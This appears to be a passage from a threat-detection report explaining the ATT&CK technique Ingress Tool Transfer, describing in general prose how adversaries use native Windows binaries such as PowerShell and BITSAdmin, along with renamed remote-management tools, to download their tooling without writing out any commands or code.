Why do adversaries use Ingress Tool Transfer?
Note: Ingress Tool Transfer has no sub-techniques.
Administrative tooling and other native operating system binaries offer adversaries a rich array of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform post-exploitation activity and accomplish their goals. The process for bringing their own tools into an environment is known as ingress tool transfer.
How do adversaries use Ingress Tool Transfer?
One way to organize the many variations on ingress tool transfer is to split the activity into two distinct but broad categories:
- transferral via native Windows binaries
- transferral via third-party tooling
Many native system binaries enable adversaries to make external network connections and download executables, scripts, and other binaries. In fact, we observe adversaries leveraging native system binaries to perform ingress tool transfer far more often than not. This is a major part of the reason that we commonly observe the Ingress Tool Transfer technique in tandem with other ATT&CK techniques. As such, we’ll spend the bulk of this section explaining how adversaries abuse legitimate executables for ingress tool transfer.
However, we’ll start with a brief examination of non-native software that adversaries use to transfer tools—hopefully setting the stage for why native tooling is an appealing choice. Almost all command and control (C2) frameworks provide support for uploading and downloading files. Despite this, adversaries frequently choose to abuse native binaries to retrieve additional tools and payloads. There are many nuanced reasons why an adversary might choose a system binary over a C2 functionality, but it mostly boils down to blending in. For example, while it might be highly suspicious for a C2-related process to reach out to an external network address and pull down a binary, it could be completely normal for a legitimate system process to do the same.
Beyond C2 tools, it’s not unusual to see adversaries using remote monitoring and management (RMM) tools to perform ingress tool transfer. RMM software can be problematic for an adversary though, as defenders can simply block the use of tools that aren’t permitted in their environment, which is precisely why adversaries often resort to renaming such tools.
PowerShell is, by a wide margin, the system binary that we detect adversaries leveraging most frequently for ingress tool transfer. Relatedly, Ingress Tool Transfer (T1105) and PowerShell (T1059.001) are the second most commonly co-occurring techniques in threat detections across Red Canary.
Another native system binary commonly abused by adversaries is BITSAdmin. BITSAdmin is a utility that manages BITS jobs (Windows Background Intelligent Transfer Service), primarily for the purpose of downloading Windows Updates, but adversaries use it to download arbitrary files.
The LOLBAS project is a great resource and searchable database that’s mapped to ATT&CK and documents native binaries, scripts, and libraries that adversaries abuse. You can examine a full list of binaries that are used for ingress tool transfer here.
While we haven’t observed it firsthand, numerous threats have reportedly performed Ingress Tool Transfer into cloud-hosted systems to download additional payloads, lateral movement scripts, and more.